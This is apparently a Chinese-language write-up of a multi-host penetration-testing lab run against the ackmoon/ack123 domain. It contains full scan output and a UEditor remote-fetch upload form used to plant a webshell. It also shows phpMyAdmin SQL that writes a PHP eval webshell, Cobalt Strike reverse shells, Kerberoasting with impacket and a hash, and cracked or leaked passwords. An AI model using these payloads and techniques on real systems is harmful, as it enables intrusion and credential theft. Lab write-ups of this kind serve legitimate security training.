靶场描述

靶场拓扑图

PS：该靶场作者：暗月

HOSTS设置

cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
# 9-ack123
192.168.0.207 www.ackmoon.com

WEB1服务器

信息收集

端口扫描

sudo nmap -sT -sV -O 192.168.0.207 -p-
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) 
Nmap scan report for www.ackmoon.com (192.168.0.207)
Host is up (0.0048s latency).
Not shown: 65517 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
80/tcp    open  http         Microsoft IIS httpd 8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
999/tcp   open  http         Microsoft IIS httpd 8.5
3306/tcp  open  mysql        MySQL (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6588/tcp  open  http         Microsoft IIS httpd 8.5
10136/tcp open  unknown
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:10:B5:76 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2012|8.1
OS CPE: cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_2012 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.32 seconds

目录遍历

dirsearch -u "http://www.ackmoon.com" -e php,htm,js,bak,zip,tar.gz,tgz,txt -r -R 1 -i 200-399

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, htm, js, bak, zip, tar.gz, tgz, txt | HTTP method: GET | Threads: 30 | Wordlist size: 12472

Output File: /home/kali/.dirsearch/reports/www.ackmoon.com.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.ackmoon.com/

[19:47:06] Starting: 
[19:47:11] 301 -  149B  - /js  ->  http://www.ackmoon.com/js/     (Added to queue)
[19:47:57] 301 -  152B  - /ADMIN  ->  http://www.ackmoon.com/ADMIN/     (Added to queue)
[19:47:58] 301 -  152B  - /Admin  ->  http://www.ackmoon.com/Admin/     (Added to queue)
[19:48:15] 301 -  157B  - /WebService  ->  http://www.ackmoon.com/WebService/     (Added to queue)
[19:48:39] 301 -  152B  - /admin  ->  http://www.ackmoon.com/admin/     (Added to queue)
[19:49:00] 302 -  134B  - /admin/?/login  ->  /admin/login.aspx           
[19:50:04] 301 -  150B  - /api  ->  http://www.ackmoon.com/api/     (Added to queue)
[19:50:45] 301 -  155B  - /database  ->  http://www.ackmoon.com/database/     (Added to queue)
[19:51:06] 200 -   17KB - /favicon.ico                                    
[19:51:22] 301 -  153B  - /images  ->  http://www.ackmoon.com/images/     (Added to queue)
[19:52:05] 301 -  148B  - /m  ->  http://www.ackmoon.com/m/     (Added to queue)
[19:52:17] 301 -  153B  - /member  ->  http://www.ackmoon.com/member/     (Added to queue)
[19:52:18] 200 -    1B  - /member/                                        
[19:53:20] 301 -  155B  - /template  ->  http://www.ackmoon.com/template/     (Added to queue)
[19:53:38] Starting: js/                                                  
[19:55:28] 301 -  154B  - /js/code  ->  http://www.ackmoon.com/js/code/   
[19:58:22] Starting: ADMIN/                                                
[20:03:27] 301 -  159B  - /ADMIN/images  ->  http://www.ackmoon.com/ADMIN/images/
[20:03:46] 301 -  157B  - /ADMIN/lang  ->  http://www.ackmoon.com/ADMIN/lang/
[20:05:44] 301 -  159B  - /ADMIN/themes  ->  http://www.ackmoon.com/ADMIN/themes/
[20:06:12] Starting: Admin/                                                
[20:11:02] 301 -  159B  - /Admin/images  ->  http://www.ackmoon.com/Admin/images/
[20:11:14] 301 -  157B  - /Admin/lang  ->  http://www.ackmoon.com/Admin/lang/
[20:13:09] 301 -  159B  - /Admin/themes  ->  http://www.ackmoon.com/Admin/themes/
[20:13:48] Starting: WebService/                                           
[20:20:32] Starting: admin/                                                
[20:24:04] 301 -  159B  - /admin/images  ->  http://www.ackmoon.com/admin/images/
[20:24:14] 301 -  157B  - /admin/lang  ->  http://www.ackmoon.com/admin/lang/
[20:25:45] 301 -  159B  - /admin/themes  ->  http://www.ackmoon.com/admin/themes/
[20:26:17] Starting: api/                                                  
[20:32:36] Starting: database/                                             
[20:38:31] Starting: images/                                               
[20:44:33] Starting: m/                                                    
[20:46:37] 301 -  155B  - /m/images  ->  http://www.ackmoon.com/m/images/   
[20:47:26] Starting: member/                                                 
[20:48:40] 301 -  160B  - /member/images  ->  http://www.ackmoon.com/member/images/
[20:49:30] Starting: template/                                               
[20:49:54] 301 -  159B  - /template/aaa  ->  http://www.ackmoon.com/template/aaa/
                                                                             
Task Completed

漏洞测试

注册用户登录后，能看到网站使用组件等敏感信息。

搜索ueditor 1.4.3漏洞。

ueditor路径查找：

修改HTML文件上传地址。

<form action="http://www.ackmoon.com/admin/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">

  <p>shell addr:<input type="text" name="source[]" /></p >

  <inputtype="submit" value="Submit" />

</form>

冰蝎上线后执行命令：

权限提升

利用冰蝎的反弹shell上线CS，SpoolSystem Injection 拿到系统权限。

DATA1服务器

CS主机发现：

1	portscan 10.10.11.0-10.10.11.255 1-1024,3389,5000-6000 arp 1024

查看网站配置文件，网站数据库机器是10.10.11.137。

1	key="HdhCmsConnStr" value="user id=sa;password=pass123@.com;initial catalog=DemoHdhCms;data source=10.10.11.137"

在第一台机器创建socks4代理，使用Multiple.Database.Utilization.Tools连接代理。

CS上线，SpoolSystem Injection拿到系统权限。

WEB2服务器

信息收集

Nmap scan report for 10.10.11.135
Host is up (1.1s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
|_http-title: \xE6\xBC\x94\xE7\xA4\xBA\xEF\xBC\x9AJWT\xE5\xAE\x9E\xE6\x88\x98\xEF\xBC\x9A\xE4\xBD\xBF\xE7\x94\xA8axios+PHP\xE5\xAE\x9E\xE7\x8E\xB0\xE7\x99\xBB\xE5\xBD\x95\xE8\xAE\xA4\xE8\xAF\x81
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql              MySQL (unauthorized)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: ACK123
|   NetBIOS_Domain_Name: ACK123
|   NetBIOS_Computer_Name: 12SERVER-WEB2
|   DNS_Domain_Name: ack123.com
|   DNS_Computer_Name: 12server-web2.ack123.com
|   DNS_Tree_Name: ack123.com
|   Product_Version: 6.3.9600
|_  System_Time: 2024-01-20T06:00:26+00:00
|_ssl-date: 2024-01-20T06:00:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=12server-web2.ack123.com
| Not valid before: 2024-01-18T07:54:23
|_Not valid after:  2024-07-19T07:54:23
4444/tcp  open  krb524?
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49157/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   302: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-01-20T06:00:30
|_  start_date: 2024-01-19T07:54:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1378.94 seconds

JWTKey爆破：

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC8xMC4xMC4xLjEzNSIsImF1ZCI6Imh0dHA6XC9cLzEwLjEwLjEuMTM1IiwiaWF0IjoxNzA1NzI5NDU0LCJuYmYiOjE3MDU3Mjk0NjQsImV4cCI6MTcwNTczMDA1NCwiZGF0YSI6eyJ1c2VyaWQiOjEsInVzZXJuYW1lIjoiZGVtbyJ9fQ.ncRTbMWg-_t5CEinpHJQOKhWeyp1jtjTXTmJ6_xBjpE:Qweasdzxc5

80端口的Apache版本信息可能是phpstudy，遍历访问是否存在某个版本phpmyadmin：

1	proxychains wfuzz -w world1 -w world2 -w world3 --ss 200 http://10.10.11.135/phpmyadminFUZZ.FUZ2Z.FUZ3Z/

使用jwt破解的秘钥：Qweasdzxc5登录成功。

phpmyadmin写入一句话：

1
2
3

set global general_log = "ON";
set global general_log_file = "c:/phpstudy_pro/www/x.php";
select '<?php eval($_REQUEST[cmd]);?>';

系统权限，直接上线CS。

域控

信息收集

拿到WEB2后，查看到还有一个段。

进程查看存在域用户，进程注入域用户后，收集域信息。

定位域控：

查询域内用户注册的SPN：

Kerberoastiong

请求所有用户SPN服务票据：

1	proxychains python ../impacket-0.10.0/examples/GetUserSPNs.py -request -dc-ip 10.10.12.135 ack123.com/web2 -hashes :85b998a3d8f1904bc6f2d6b5f418be7e -outputfile hash.txt

Hashcat爆破：

拿到密码，上线CS：

P@55w0rd!

DATA2服务器

直接通过域控权限上线DATA2服务器：

所有机器上线：